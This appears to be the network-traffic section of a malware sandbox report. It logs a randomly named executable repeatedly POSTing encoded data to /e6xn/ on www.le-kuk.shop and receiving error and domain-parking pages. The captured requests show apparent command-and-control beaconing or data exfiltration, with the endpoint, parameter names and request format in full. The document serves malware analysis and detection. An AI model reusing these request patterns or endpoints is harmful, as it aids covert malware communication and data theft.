                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  45192.168.2.104976189.31.143.90806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:49:15.008939981 CET748OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.le-kuk.shop
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.le-kuk.shop
                                                                                  Referer: http://www.le-kuk.shop/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 46 38 54 4f 54 41 59 31 4d 46 46 77 7a 34 6d 35 71 37 73 7a 46 50 5a 4d 6a 4e 64 67 4b 38 36 7a 36 52 63 53 31 33 70 46 38 30 4e 37 69 44 58 6a 30 38 4f 42 65 4c 35 54 39 42 77 52 78 4a 58 75 57 4b 54 4d 36 37 6c 35 4c 69 61 37 63 2f 36 31 37 73 71 43 6a 38 72 55 2f 54 59 6a 6a 62 4a 49 75 43 49 38 32 37 39 4d 2b 70 76 54 69 56 67 6d 58 76 6a 2f 5a 36 31 70 55 2b 53 47 4b 2b 37 58 69 38 65 65 45 79 4b 48 76 48 32 37 76 36 59 6f 39 36 52 66 52 32 42 48 31 6c 74 54 30 4a 73 42 75 58 79 4c 57 65 47 66 4f 4e 2b 53 57 65 32 74 79 35 61 4a 70 66 41 6f 6c 2b 67 2f
                                                                                  Data Ascii: bvOt=F8TOTAY1MFFwz4m5q7szFPZMjNdgK86z6RcS13pF80N7iDXj08OBeL5T9BwRxJXuWKTM67l5Lia7c/617sqCj8rU/TYjjbJIuCI8279M+pvTiVgmXvj/Z61pU+SGK+7Xi8eeEyKHvH27v6Yo96RfR2BH1ltT0JsBuXyLWeGfON+SWe2ty5aJpfAol+g/
                                                                                  Mar 18, 2024 14:49:15.190285921 CET735INHTTP/1.1 405 Not Allowed
                                                                                  Date: Mon, 18 Mar 2024 13:49:15 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 556
                                                                                  Connection: close
                                                                                  Server: UD Webspace 3.2
                                                                                  Allow: GET, POST, HEAD
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  46192.168.2.104976289.31.143.90806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:49:17.708077908 CET772OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.le-kuk.shop
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.le-kuk.shop
                                                                                  Referer: http://www.le-kuk.shop/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 46 38 54 4f 54 41 59 31 4d 46 46 77 79 59 57 35 70 59 45 7a 53 2f 5a 4c 76 74 64 67 46 63 36 33 36 51 67 53 31 32 73 64 38 6d 70 37 6c 69 48 6a 6d 35 36 42 64 4c 35 54 32 68 77 49 2f 70 58 6c 57 4b 76 31 36 2b 46 35 4c 69 65 37 63 37 2b 31 34 66 79 42 69 73 72 42 71 6a 59 68 2b 4c 4a 49 75 43 49 38 32 37 6f 70 2b 70 33 54 2b 30 51 6d 51 2b 6a 34 52 61 30 62 56 2b 53 47 4f 2b 37 62 69 38 66 4e 45 32 72 67 76 44 47 37 76 36 6f 6f 38 70 49 4a 43 57 42 46 37 46 73 30 31 37 6c 61 72 6c 7a 35 4f 2f 47 53 54 75 57 6c 63 66 58 71 6a 6f 37 65 36 6f 63 6d 72 34 56 56 33 77 76 35 6c 74 4a 2b 34 77 76 6d 31 48 58 45 48 66 45 52 78 41 3d 3d
                                                                                  Data Ascii: bvOt=F8TOTAY1MFFwyYW5pYEzS/ZLvtdgFc636QgS12sd8mp7liHjm56BdL5T2hwI/pXlWKv16+F5Lie7c7+14fyBisrBqjYh+LJIuCI827op+p3T+0QmQ+j4Ra0bV+SGO+7bi8fNE2rgvDG7v6oo8pIJCWBF7Fs017larlz5O/GSTuWlcfXqjo7e6ocmr4VV3wv5ltJ+4wvm1HXEHfERxA==
                                                                                  Mar 18, 2024 14:49:17.887317896 CET735INHTTP/1.1 405 Not Allowed
                                                                                  Date: Mon, 18 Mar 2024 13:49:17 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 556
                                                                                  Connection: close
                                                                                  Server: UD Webspace 3.2
                                                                                  Allow: GET, POST, HEAD
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  47192.168.2.104976389.31.143.90806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:49:20.411355972 CET1785OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.le-kuk.shop
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.le-kuk.shop
                                                                                  Referer: http://www.le-kuk.shop/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 46 38 54 4f 54 41 59 31 4d 46 46 77 79 59 57 35 70 59 45 7a 53 2f 5a 4c 76 74 64 67 46 63 36 33 36 51 67 53 31 32 73 64 38 6d 68 37 69 51 66 6a 30 65 6d 42 63 4c 35 54 2f 42 77 56 2f 70 58 43 57 4b 48 78 36 2b 41 45 4c 67 57 37 64 65 71 31 76 61 47 42 73 73 72 42 31 7a 59 6b 6a 62 4a 52 75 43 59 77 32 34 51 70 2b 70 33 54 2b 33 34 6d 44 50 6a 34 54 61 31 70 55 2b 54 55 4b 2b 36 79 69 38 47 34 45 33 72 61 76 77 4f 37 6f 61 34 6f 36 62 51 4a 59 57 42 44 38 46 73 73 31 37 35 2f 72 6c 2b 41 4f 2f 79 6f 54 75 2b 6c 52 65 36 41 30 61 4c 4b 6d 34 45 64 67 4f 64 38 38 48 37 43 76 64 35 37 32 78 37 47 70 46 47 6f 4f 4d 70 5a 69 78 4b 6a 55 69 30 2f 75 30 6c 69 6e 33 4c 34 32 30 52 65 4f 48 51 41 2f 51 78 6c 66 6f 46 55 44 6a 51 6e 67 54 6a 66 45 4e 51 2f 31 42 56 47 53 39 49 2b 45 39 42 65 35 78 36 51 78 56 76 2f 78 73 59 38 54 70 2f 6a 73 6e 58 41 56 73 69 59 65 50 58 44 36 4c 64 7a 6a 55 2b 67 4a 39 4d 66 43 77 61 6d 33 73 6a 37 74 54 44 34 6b 68 32 79 41 54 51 33 4f 42 4c 4e 45 65 52 52 62 73 75 65 30 48 4b 5a 50 69 30 43 64 38 2b 41 74 56 6b 50 51 2f 4d 76 47 2b 73 75 31 62 77 50 41 63 36 63 33 35 45 5a 41 6d 6b 7a 33 58 37 33 48 31 5a 37 43 76 75 6e 4e 58 41 55 68 67 36 34 52 6e 31 76 47 73 63 70 59 54 6d 42 6b 4f 6e 30 5a 37 55 52 45 32 68 74 65 57 55 57 68 4e 42 4d 77 32 33 73 4e 68 75 31 67 74 41 64 33 71 4f 64 55 47 2f 44 66 73 63 66 33 58 6f 4f 57 68 68 73 7a 69 31 39 4e 49 75 59 39 57 75 54 30 6c 75 62 63 6f 62 6e 61 57 49 42 6a 44 4a 6e 31 46 4a 61 56 56 6c 75 65 75 38 6d 2f 64 53 71 65 69 4c 48 57 57 32 55 6e 71 4d 31 38 74 6f 49 6b 53 5a 54 43 75 2b 37 39 69 50 52 70 7a 48 31 44 72 64 4c 34 63 36 4e 4e 58 38 64 6c 66 32 43 2f 72 7a 39 4c 37 6a 76 7a 52 63 77 7a 68 5a 71 64 73 48 41 6b 6e 63 57 43 59 46 46 52 65 69 32 64 67 62 7a 36 57 44 4f 45 63 34 71 73 74 53 4a 51 45 69 75 48 76 48 77 54 4a 39 4d 38 45 59 47 52 57 44 30 6f 4f 64 45 56 49 56 35 4c 44 6a 4d 54 73 62 34 63 38 4a 37 52 6f 66 37 6f 53 48 5a 4a 63 6f 4c 4f 2b 6f 44 67 57 42 72 31 58 36 2b 36 53 54 6f 62 5a 72 54 7a 6f 7a 51 76 5a 54 55 32 4d 59 57 67 33 6c 37 37 76 50 76 51 69 75 33 7a 43 30 2f 6f 6c 48 5a 47 31 69 57 50 73 50 52 48 61 6a 55 6d 72 72 32 69 79 55 56 50 58 38 5a 45 2f 6c 41 6b 46 68 4c 41 4e 53 54 4b 33 42 4a 49 4c 30 5a 4c 51 56 77 4d 73 5a 62 71 4e 43 35 55 49 48 36 62 6f 53 57 51 30 69 52 67 37 76 37 62 59 52 6b 32 63 50 4a 63 72 63 47 50 4e 6d 77 56 56 74 30 72 38 65 58 43 31 71 41 52 4d 61 4e 6a 49 66 37 44 57 6c 51 6b 6e 79 6b 41 70 6d 6e 69 4f 4b 64 78 6c 56 49 30 4d 6b 31 50 69 58 51 5a 55 56 36 59 4f 39 4f 50 43 53 43 42 6f 5a 6b 4d 30 62 39 43 35 4e 33 6a 46 42 30 58 56 57 2b 33 43 53 53 6c 6c 2b 6e 37 77 62 41 55 51 37 55 64 41 65 6f 65 2b 31 72 4e 65 32 78 50 57 4f 47 64 54 54 61 6f 66 6e 7a 6c 44 59 55 4f 58 33 4c 57 2f 78 33 70 65 4a 6e 30 67 4e 4a 42 73 31 34 69 67 6e 68 32 4f 75 51 2b 69 42 61 35 45 52 47 6e 65 36 43 68 31 50 69 78 2f 77 42 77 5a 6d 72 32 32 75 79 72 45 64 36 4b 44 30 73 4d 4b 35 4b 66 74 59 46 78 57 36 4a 59 67 71 50 58 41 35 66 37 42 67 32 76 5a 66 47 4f 33 35 41 70 43 74 42 45 43 4b 41 78 75 42 31 77 44 79 55 4e 78 6b 4b 35 56 69 5a 6c 39 45 61 4b 6a 46 71 71 34 50 79 65 4c 50 66 68 2b 4b 73 59 34 55 4d 63 65 47 48 39 49 4a 69 2b 72 4e 7a 65 74 71 79 53 57 79 4e 4d 35 54 54 33 62 4c 58 45 36 6c 72 6d 5a 76 4d 43 64 4d 58 4c 46 49 49 70 4e 7a 75 2b 30 55 48 43 33 68 63 6e 4f 35 33 53 61 34 5a 77 43 73 42 54 71 6d 62 37 66 58 6b 4f 66 34 39 32 5a 67 32 55 78 6c 51 41 69 5a 6c 47 73 6b 48 57 55 66 51 5a 55 6e 72 61 43 55 4d 4c 49 72 79 48 45 73 6f 4d 6b 48 6f 33 51 34 6f 41 64 34 48 75 38 6c 78 76 73 6b 6f 47 30 58 75 4a 4b 4e 41 4f 4c 42 70 71 31 71 32 64 59 33 41 48 54 44 70 66 47 30 3d
                                                                                  Data Ascii: bvOt=F8TOTAY1MFFwyYW5pYEzS/ZLvtdgFc636QgS12sd8mh7iQfj0emBcL5T/BwV/pXCWKHx6+AELgW7deq1vaGBssrB1zYkjbJRuCYw24Qp+p3T+34mDPj4Ta1pU+TUK+6yi8G4E3ravwO7oa4o6bQJYWBD8Fss175/rl+AO/yoTu+lRe6A0aLKm4EdgOd88H7Cvd572x7GpFGoOMpZixKjUi0/u0lin3L420ReOHQA/QxlfoFUDjQngTjfENQ/1BVGS9I+E9Be5x6QxVv/xsY8Tp/jsnXAVsiYePXD6LdzjU+gJ9MfCwam3sj7tTD4kh2yATQ3OBLNEeRRbsue0HKZPi0Cd8+AtVkPQ/MvG+su1bwPAc6c35EZAmkz3X73H1Z7CvunNXAUhg64Rn1vGscpYTmBkOn0Z7URE2hteWUWhNBMw23sNhu1gtAd3qOdUG/Dfscf3XoOWhhszi19NIuY9WuT0lubcobnaWIBjDJn1FJaVVlueu8m/dSqeiLHWW2UnqM18toIkSZTCu+79iPRpzH1DrdL4c6NNX8dlf2C/rz9L7jvzRcwzhZqdsHAkncWCYFFRei2dgbz6WDOEc4qstSJQEiuHvHwTJ9M8EYGRWD0oOdEVIV5LDjMTsb4c8J7Rof7oSHZJcoLO+oDgWBr1X6+6STobZrTzozQvZTU2MYWg3l77vPvQiu3zC0/olHZG1iWPsPRHajUmrr2iyUVPX8ZE/lAkFhLANSTK3BJIL0ZLQVwMsZbqNC5UIH6boSWQ0iRg7v7bYRk2cPJcrcGPNmwVVt0r8eXC1qARMaNjIf7DWlQknykApmniOKdxlVI0Mk1PiXQZUV6YO9OPCSCBoZkM0b9C5N3jFB0XVW+3CSSll+n7wbAUQ7UdAeoe+1rNe2xPWOGdTTaofnzlDYUOX3LW/x3peJn0gNJBs14ignh2OuQ+iBa5ERGne6Ch1Pix/wBwZmr22uyrEd6KD0sMK5KftYFxW6JYgqPXA5f7Bg2vZfGO35ApCtBECKAxuB1wDyUNxkK5ViZl9EaKjFqq4PyeLPfh+KsY4UMceGH9IJi+rNzetqySWyNM5TT3bLXE6lrmZvMCdMXLFIIpNzu+0UHC3hcnO53Sa4ZwCsBTqmb7fXkOf492Zg2UxlQAiZlGskHWUfQZUnraCUMLIryHEsoMkHo3Q4oAd4Hu8lxvskoG0XuJKNAOLBpq1q2dY3AHTDpfG0=
                                                                                  Mar 18, 2024 14:49:20.590485096 CET735INHTTP/1.1 405 Not Allowed
                                                                                  Date: Mon, 18 Mar 2024 13:49:20 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 556
                                                                                  Connection: close
                                                                                  Server: UD Webspace 3.2
                                                                                  Allow: GET, POST, HEAD
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  48192.168.2.104976489.31.143.90806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:49:23.116359949 CET497OUTGET /e6xn/?bvOt=I+7uQ1p9U2QgrZ2LiZBQD/xPqYJdH7KI3wBT7UIkgW5Aog6q3Z2jXuQC4TUh/9LTZ7Sd+JF5RXm6MN/mwd+CmdOx0GtGi60mugQ+ypEmsJunmkEeVg==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.le-kuk.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:49:23.299321890 CET159INHTTP/1.1 200 OK
                                                                                  Date: Mon, 18 Mar 2024 13:49:23 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Server: UD Webspace 3.2
                                                                                  Data Raw: 31 39 65 30 0d 0a
                                                                                  Data Ascii: 19e0
                                                                                  Mar 18, 2024 14:49:23.299587011 CET1286INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 72 65 67 69 73
                                                                                  Data Ascii: <!DOCTYPE html><html lang="de"><head><meta name="description"content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type"content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,htm
                                                                                  Mar 18, 2024 14:49:23.299642086 CET1286INData Raw: 54 70 45 41 50 59 61 64 38 47 41 36 41 41 41 41 41 58 52 53 54 6c 4d 41 51 4f 62 59 5a 67 41 41 42 38 70 4a 52 45 46 55 65 4e 72 74 6d 6f 75 53 6f 79 6f 51 51 42 73 78 43 42 68 41 35 50 48 2f 6e 33 70 74 6e 6f 62 64 5a 4a 78 39 31 63 79 74 6e 4b
                                                                                  Data Ascii: TpEAPYad8GA6AAAAAXRSTlMAQObYZgAAB8pJREFUeNrtmouSoyoQQBsxCBhA5PH/n3ptnobdZJx91cytnKpJCELTHkHJbuDN94WwVSFihjefhggXYwwhRHyzHN58BqJCDEbNal1nE5Eg4M1lePB2JcSGeMK/V/JVjCU438SqQjzznoSXIH6FyqScESIWgoE3F/wJqMxhSm/MWhRo4tvgx1gBHUZayfuofFzh/wpTDP4Eyjzb1oC
                                                                                  Mar 18, 2024 14:49:23.299721003 CET1286INData Raw: 51 37 63 35 2b 38 34 7a 32 77 33 36 44 37 57 50 79 31 51 48 2b 36 4b 4f 79 53 51 47 51 32 46 7a 65 43 4e 61 50 36 2b 48 54 58 42 4d 62 7a 58 64 78 41 51 51 43 38 66 67 72 50 5a 6c 78 51 33 73 61 52 41 4d 2b 66 77 75 64 72 56 73 71 52 76 42 5a 34
                                                                                  Data Ascii: Q7c5+84z2w36D7WPy1QH+6KOySQGQ2FzeCNaP6+HTXBMbzXdxAQQC8fgrPZlxQ3saRAM+fwudrVsqRvBZ4ztdeEDhNkDAXBfL4gPlQYKjGmaqdg+GMKRMiPOwDWd8HVjwhLr6kXw9VPjIgvO4Dq0lft57Y/KXAni9wFy8IVNGblbE1XBM47venDwXa2IBxPo1X5AeBqxie3aE8RYYV/PybyByG+Uo+EKji5x4idvTxmiEjAR8KZ
                                                                                  Mar 18, 2024 14:49:23.299757004 CET1286INData Raw: 4a 64 30 6e 6b 47 32 58 4f 48 4d 42 77 36 55 5a 69 45 47 77 30 35 65 47 33 72 56 47 61 33 51 42 57 48 42 50 6e 61 78 69 49 52 32 37 4c 2f 68 42 45 69 42 33 66 59 50 6c 71 4c 67 42 4e 6c 39 79 4f 33 77 6c 6b 70 44 55 68 6b 70 63 31 61 6c 4a 2f 6f
                                                                                  Data Ascii: Jd0nkG2XOHMBw6UZiEGw05eG3rVGa3QBWHBPnaxiIR27L/hBEiB3fYPlqLgBNl9yO3wlkpDUhkpc1alJ/ozFWrPUTtj+qDwiSxw0HaaQR6VA7hKghMPMSqf/AOVXTmgqvu9mAAAAAElFTkSuQmCC');overflow:hidden;text-indent:-9999px;font-size:0;color:rgba(255,255,255,0);text-align:left}#l
                                                                                  Mar 18, 2024 14:49:23.299829960 CET1286INData Raw: 6c 74 2e 20 53 69 65 20 77 69 72 64 20 62 65 69 20 6a 65 64 65 72 20 6e 65 75 65 6e 20 44 6f 6d 61 69 6e 20 68 69 6e 74 65 72 6c 65 67 74 20 75 6e 64 20 7a 65 69 67 74 2c 20 64 61 73 73 20 64 69 65 20 6e 65 75 65 20 44 6f 6d 61 69 6e 20 65 72 72
